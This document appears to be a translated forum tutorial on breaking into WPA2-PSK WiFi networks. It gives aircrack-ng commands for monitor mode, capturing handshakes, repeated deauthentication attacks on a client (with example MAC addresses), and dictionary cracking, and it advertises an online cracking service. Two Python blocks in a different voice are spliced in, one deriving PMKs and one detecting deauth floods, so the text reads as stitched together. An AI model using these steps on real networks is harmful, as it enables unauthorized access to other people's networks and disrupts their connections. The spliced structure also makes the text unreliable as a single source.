WiFi Wireless Penetration Using the Most Basic Method

caocao · 1 year ago · Tutorials · 187

Online WiFi handshake cracking: jingang packages, cap files, hccapx, EWSA online, all at Caocao WiFi

Hello everyone, we meet again. I am Caocao, and today I bring you a new tutorial.

I hope you all study it carefully and keep a low profile online.

WPA/WPA2: WPA/WPA2 is an encryption scheme that is stronger than WEP. When this security type is selected, the router uses a RADIUS server for authentication and obtains the key in WPA or WPA2 form. Because setting up a dedicated authentication server is costly and complex, this security type is not recommended for ordinary users.

WPA-PSK/WPA2-PSK: WPA-PSK/WPA2-PSK is in fact a simplified version of WPA/WPA2, based on a shared (pre-shared) key. It offers high security with relatively simple configuration, and is suitable for home users and small businesses.

Detailed settings include:

Authentication Type: This option selects the security format used by the system, namely Enterprise, WPA-PSK, or WPA2-PSK.

Enterprise: If this option is selected, the router automatically chooses between the WPA-PSK and WPA2-PSK security formats according to the client's request.

Encryption Algorithm: This option selects the algorithm used to encrypt wireless data. The choices are Enterprise, TKIP, and AES; the default is Enterprise. If Enterprise is selected, the router automatically chooses between TKIP and AES as needed. Note that 11N mode does not support the TKIP algorithm.

PSK Passphrase: This is the initial key for WPA-PSK/WPA2-PSK. It must be entered as 8-63 ASCII characters or 8-64 hexadecimal characters.

Group Key Update Period: This setting controls how often the broadcast and group keys are refreshed, in seconds. The minimum value is 30; a value of 0 disables the update entirely.
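The settings above fix the format of the PSK and the rekey period, and the PSK passphrase is what the dictionary attack at the end of this tutorial tries to guess. The following Python is an added example (not code from the original post or from any router vendor) that checks a key and a group key update period against those rules and derives the WPA-PSK/WPA2-PSK pairwise master key (PMK) from passphrase and SSID, which shows why every dictionary candidate costs 4096 HMAC-SHA1 iterations and why a long passphrase matters. It assumes the hexadecimal form is exactly 64 digits (the 256-bit PMK); the benchmark passphrase and SSID are constructed placeholders, and the "password"/"IEEE" vector is the published IEEE 802.11i test vector.

```python
import hashlib
import re
import time

# Format rules quoted from the router settings above: a PSK passphrase is
# 8-63 ASCII characters, or the key is given directly in hexadecimal; the
# group key update period is 0 (disabled) or at least 30 seconds.
# Assumption: the hex form is treated as exactly 64 digits (the 256-bit PMK).
HEX_KEY_RE = re.compile(r"^[0-9a-fA-F]{64}$")


def validate_psk(key):
    """Return (ok, reason) for a WPA-PSK/WPA2-PSK key string."""
    if HEX_KEY_RE.match(key):
        return True, "64-digit hex key, used directly as the PMK"
    if not all(32 <= ord(c) <= 126 for c in key):
        return False, "passphrase must consist of printable ASCII characters"
    if not 8 <= len(key) <= 63:
        return False, "ASCII passphrase must be 8-63 characters long"
    return True, "ASCII passphrase"


def validate_group_key_period(seconds):
    """0 disables rekeying; any other value must be at least 30 seconds."""
    return seconds == 0 or seconds >= 30


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes),
    as specified for WPA-PSK/WPA2-PSK. The PMK depends only on the passphrase
    and the SSID, which is why a captured handshake can be checked against a
    dictionary offline: each candidate costs one of these derivations."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def benchmark_pmk_rate(samples=20):
    """Rough single-core PMK derivations per second on this machine. Treat it
    as a lower bound for what GPU-based dictionary tools achieve, and size
    passphrases accordingly."""
    start = time.perf_counter()
    for i in range(samples):
        # constructed placeholder passphrase and SSID, only for timing
        derive_pmk("benchmark-passphrase-%d" % i, "benchmark-ssid")
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    for candidate in ["short", "correct horse battery staple",
                      "0123456789abcdef" * 4, "g" * 64]:
        print(repr(candidate)[:30], validate_psk(candidate))
    print("period 0 ok:", validate_group_key_period(0),
          "period 10 ok:", validate_group_key_period(10))
    # Published IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print(derive_pmk("password", "IEEE").hex())
    print("%.0f PMK derivations/s on one core" % benchmark_pmk_rate())
```

The hex branch matters for defenders: a 64-digit hex key is the PMK itself, so it is never subject to the PBKDF2 dictionary step at all, whereas an ASCII passphrase is only as strong as its resistance to guessing at the rate the benchmark reports.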

Capturing the WPA2-PSK handshake with Aircrack-ng:

Main steps:

  1. Put the wireless card into monitor mode: airmon-ng start wlan0

  2. Scan for nearby WPA2-PSK encrypted wireless networks: airodump-ng wlan0mon

  3. Open a new terminal and capture the handshake: airodump-ng -c [num] -w wpa2 wlan0mon (-c specifies the channel)

  4. While waiting, launch a deauthentication (DeAuth) attack to force the client to disconnect and reconnect, so the handshake is captured: aireplay-ng -0 5 -a BSSID -c STATION wlan0mon (-0 5 sends 5 deauthentication bursts)

To keep sending deauthentication frames indefinitely, use: aireplay-ng -0 0 -a BSSID -c STATION wlan0mon

Let's begin. I am using a TL-WN722N wireless card. First the card has to be attached to the virtual machine; once it is connected, ifconfig shows its details. Then I run airmon-ng start wlan0 to enable monitor mode.

In the airodump-ng output, the CH column is the channel. Use airodump-ng -c channel --bssid xxx -w save_path wlan0mon to scan the target and capture its handshake packets.

Parameters: --ivs -w FAN (save captured packets in IVS format under the name "test"); --bssid (the BSSID of the AP to be cracked).

Force the client to disconnect: aireplay-ng -0 0 -a target_AP_MAC -c target_client_MAC wlan0mon

For example: aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon

Launch the attack. Sometimes this command fails because the card is hopping channels at random; repeat the same command until it succeeds.
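The deauthentication step above works because a WPA2 network without Protected Management Frames accepts unauthenticated deauth/disassoc frames, so a burst of them spoofed from the AP's address is the signature a defender should look for. The Python below is an added example (not code from the original post or from the Aircrack-ng project) of a small detector: it parses raw 802.11 management frames, picks out deauthentication (subtype 12) and disassociation (subtype 10) frames, and raises one alert per BSSID when at least a threshold number of them arrive within a sliding time window. The frame builder, the addresses (locally administered 02:00:... placeholders) and the timestamps are constructed sample input, not a real capture.

```python
import struct
from collections import defaultdict

# First byte of the 802.11 frame control field, read low bit first:
# protocol version (2 bits), type (2 bits), subtype (4 bits).
FC_DEAUTH = 0xC0    # type 0 (management), subtype 12 (deauthentication)
FC_DISASSOC = 0xA0  # type 0 (management), subtype 10 (disassociation)
KIND = {FC_DEAUTH: "deauth", FC_DISASSOC: "disassoc"}


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_mgmt_frame(fc0, dst, src, bssid, reason):
    """Constructed sample frame: FC, duration, addr1/2/3, seq-ctrl, reason code."""
    return (bytes([fc0, 0x00]) + b"\x00\x00"
            + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))


def parse_frame(raw):
    """Return (kind, dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(raw) < 26 or raw[0] not in KIND:
        return None
    dst, src, bssid = raw[4:10], raw[10:16], raw[16:22]
    reason = struct.unpack_from("<H", raw, 24)[0]
    return KIND[raw[0]], mac_str(dst), mac_str(src), mac_str(bssid), reason


def detect_deauth_flood(frames, window=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).
    Emit one alert per BSSID once `threshold` deauth/disassoc frames for that
    BSSID fall inside any `window`-second interval."""
    recent = defaultdict(list)   # bssid -> timestamps inside the window
    alerted = set()
    alerts = []
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        parsed = parse_frame(raw)
        if parsed is None:
            continue
        kind, dst, src, bssid, reason = parsed
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:  # slide the window forward
            q.pop(0)
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "first": q[0],
                           "last": ts, "victim": dst, "kind": kind,
                           "reason": reason})
    return alerts


# Constructed placeholder addresses (locally administered, not real devices).
AP = "02:00:00:00:00:01"
CLIENT = "02:00:00:00:00:02"
OTHER_AP = "02:00:00:00:00:99"


def sample_capture():
    """Constructed traffic: 8 spoofed deauths 0.2 s apart from AP to CLIENT,
    one lone disassociation on another network, and one data frame."""
    frames = [(100.0 + 0.2 * i, build_mgmt_frame(FC_DEAUTH, CLIENT, AP, AP, 7))
              for i in range(8)]
    frames.append((105.0, build_mgmt_frame(FC_DISASSOC, OTHER_AP,
                                           "02:00:00:00:00:03", OTHER_AP, 8)))
    frames.append((101.0, bytes([0x08, 0x00]) + b"\x00" * 30))  # data frame, ignored
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print("deauth flood on %(bssid)s: %(count)d frames in %(first).1f-%(last).1f s, "
              "victim %(victim)s, reason %(reason)d" % alert)
```

Feeding this frames read from a monitor-mode capture (for example with a pcap library that strips the radiotap header) turns it into a basic wireless IDS rule. The real mitigation is to enable 802.11w Protected Management Frames on the AP and clients, which authenticates deauth and disassoc frames so spoofed ones are discarded; WPA3 makes PMF mandatory.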

If the handshake is captured successfully, airodump-ng shows it as in the figure.

Start cracking the password by executing the following command.

Finally, brute-force the handshake with a good dictionary. Once cracking succeeds, the password is displayed. If the password is complex, this can take a long time.

Disclaimer: The content shared on this public account is only for technical discussions among cybersecurity enthusiasts. It is prohibited to use it for illegal purposes. All penetration testing must be authorized. Otherwise, you will be responsible for the consequences. This public account and the original author do not bear any corresponding liability.
